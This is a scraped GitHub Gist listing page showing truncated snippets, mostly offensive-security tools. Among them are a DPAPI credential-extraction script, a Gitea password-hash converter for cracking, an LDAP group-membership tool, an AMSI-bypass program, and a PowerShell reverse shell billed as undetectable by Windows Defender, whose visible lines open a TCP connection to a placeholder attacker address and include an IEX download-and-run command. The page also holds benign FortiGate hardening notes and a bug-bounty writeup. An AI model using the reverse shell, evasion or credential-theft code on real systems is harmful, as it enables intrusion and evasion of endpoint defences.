Skip to content

Instantly share code, notes, and snippets.

View 0xSebin's full-sized avatar
🎯
Focusing

Sebin Thomas 0xSebin

🎯
Focusing
View GitHub Profile
@ArchiMoebius
ArchiMoebius / yeetdpapi.py
Created May 19, 2025 01:23
DPAPI is a pain - less so now - if you've wsman ; )
#!/usr/bin/env -S uv run --script
# /// script
# requires-python = ">=3.10"
# dependencies = [
# "pypykatz",
# "pypsrp",
# "typer",
# "rich",
# ]
# ///
@h4rithd
h4rithd / gitea2hashcat.py
Last active June 13, 2025 19:43
Crack the Gitea password using hashcat. The script was taken from an IppSec's video. [https://youtu.be/aG_N2ZiCfxk?t=2419]
import sqlite3
import base64
import sys
if len(sys.argv) != 2:
print("Usage: python3 gitea3hashcat.py <gitea.db>")
sys.exit(1)
try:
con = sqlite3.connect(sys.argv[1])
@hackermondev
hackermondev / zendesk.md
Last active October 30, 2025 16:39
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like support@company.com), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

@ArchiMoebius
ArchiMoebius / adduser.py
Last active October 7, 2025 09:18
Use impacket + LDAP to add a user to a group
#!/usr/bin/env python3
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
@kozmer
kozmer / ldapsearch_parser.py
Last active October 6, 2025 13:25
linux ldapsearch parser for bofhound
# linux ldapsearch parser for bofhound, useful for environments that have ldap signing/binding and require kerberos auth.
# add support for msDS-KeyCredentialLink
"""
$ ldapsearch -LLL -o ldif-wrap=no -E '!1.2.840.113556.1.4.801=::MAMCAQc=' -H ldap://dc.fake.com -Y GSSAPI -N -b "DC=fake,DC=com" "(&(objectClass=*))" > ldapsearch_out.txt
SASL/GSSAPI authentication started
SASL username: redacted@FAKE.COM
SASL SSF: 256
SASL data security layer installed.
@githubfoam
githubfoam / fortigate - Firewall Hardening cheat sheet
Last active October 1, 2025 11:37
fortigate - Firewall Hardening cheat sheet
#=====================================================================
#Bard
#configure an email alert on each successful VPN SSL connection on FortiGate 7.2:
Go to Security Fabric > Automation.
Click Create New.
In the Name field, enter a name for the automation stitch.
In the Trigger field, select FortiOS Event Log.
In the Event field, select SSL VPN Tunnel Up.
@susMdT
susMdT / Program.cs
Created February 24, 2023 02:57
C# Amsi bypass with hardware breakpint
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
// CCOB IS THE GOAT
@cinnamon-msft
cinnamon-msft / settings.json
Created January 25, 2023 00:23
Windows Terminal New Tab Dropdown Customization
"newTabMenu":
[
{
"type": "remainingProfiles"
},
{
"allowEmpty": false,
"entries":
[
{
@githubfoam
githubfoam / fortigate cheat sheet
Last active March 12, 2025 06:34
fortigate cheat sheet
#=====================================================================
#CIS benchmark
https://www.cisecurity.org/benchmark/fortinet
#=====================================================================
Packet flow ingress and egress: FortiGates without network processor offloading
https://docs.fortinet.com/document/fortigate/6.4.0/parallel-path-processing-life-of-a-packet/86811/packet-flow-ingress-and-egress-fortigates-without-network-processor-offloading
#=====================================================================
CLI
the control key sequences shown in the following table:
@guglia001
guglia001 / Undetectable_reverse_powershell_5-9-22.ps1
Created May 9, 2022 14:37
Powershell reverse shell script undetectable by windows defender
#based on original script by @nikhil_mitt. Change ip and port
#Undetectable on 05/09/2022
# Example IEX(New-Object Net.WebClient).downloadString('http://<ip>/<file>.ps1')
$KLK = New-Object System.Net.Sockets.TCPClient('<ip>','<port>');
$PLP = $KLK.GetStream();
[byte[]]$VVCCA = 0..((2-shl(3*5))-1)|%{0};
$VVCCA = ([text.encoding]::UTF8).GetBytes("Succesfuly connected .`n`n")
$PLP.Write($VVCCA,0,$VVCCA.Length)
$VVCCA = ([text.encoding]::UTF8).GetBytes((Get-Location).Path + ' > ')